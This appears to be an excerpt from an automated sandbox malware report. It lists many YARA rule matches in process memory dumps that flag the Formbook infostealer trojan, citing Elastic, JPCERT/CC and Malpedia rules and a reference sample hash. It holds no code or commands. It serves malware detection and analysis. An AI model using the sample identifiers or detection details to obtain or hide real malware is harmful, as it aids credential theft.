              Source: 00000016.00000003.1778571483.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000016.00000003.1778571483.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000022.00000003.1994440354.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000022.00000003.1994440354.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000022.00000003.1994440354.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000016.00000003.1784873248.0000000000E34000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000016.00000003.1784873248.0000000000E34000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000016.00000003.1784873248.0000000000E34000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000025.00000002.2032446289.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000025.00000002.2032446289.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000025.00000002.2032446289.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000016.00000003.1781279846.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000016.00000003.1781279846.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000016.00000003.1781279846.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0000001B.00000003.1914895579.0000000001A12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000001B.00000003.1914895579.0000000001A12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0000001B.00000003.1914895579.0000000001A12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000022.00000003.1993986799.00000000016C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000022.00000003.1993986799.00000000016C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000022.00000003.1993986799.00000000016C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000016.00000003.1779088648.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000016.00000003.1779088648.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000016.00000003.1779088648.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0000001B.00000003.1917625527.00000000019DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000001B.00000003.1917625527.00000000019DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0000001B.00000003.1917625527.00000000019DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000022.00000003.1995504017.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000022.00000003.1995504017.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000022.00000003.1995504017.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000016.00000003.1785265319.000000000378C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000016.00000003.1785265319.000000000378C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000016.00000003.1785265319.000000000378C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000016.00000003.1779323188.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000016.00000003.1779323188.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000016.00000003.1779323188.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000016.00000003.1785169179.0000000000D7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000016.00000003.1785169179.0000000000D7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000016.00000003.1785169179.0000000000D7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000008.00000003.1633266545.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000008.00000003.1633266545.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000008.00000003.1633266545.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0000001B.00000003.1913572826.00000000019E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000001B.00000003.1913572826.00000000019E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0000001B.00000003.1913572826.00000000019E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000022.00000003.1995901696.0000000004154000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000022.00000003.1995901696.0000000004154000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000022.00000003.1995901696.0000000004154000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0000001A.00000002.1823176871.0000000000FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000001A.00000002.1823176871.0000000000FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0000001A.00000002.1823176871.0000000000FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000008.00000003.1631433911.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000008.00000003.1631433911.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000008.00000003.1631433911.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000008.00000003.1631393564.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000008.00000003.1631393564.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000008.00000003.1631393564.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000022.00000003.1994684726.000000000170D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000022.00000003.1994684726.000000000170D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000022.00000003.1994684726.000000000170D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000011.00000002.2649074855.0000000010EA2000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
              Source: 00000008.00000003.1632049860.000000000102C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000008.00000003.1632049860.000000000102C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000008.00000003.1632049860.000000000102C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0000001B.00000003.1916791732.00000000019B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000001B.00000003.1916791732.00000000019B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0000001B.00000003.1916791732.00000000019B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000016.00000003.1785668153.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000016.00000003.1785668153.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000016.00000003.1785668153.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
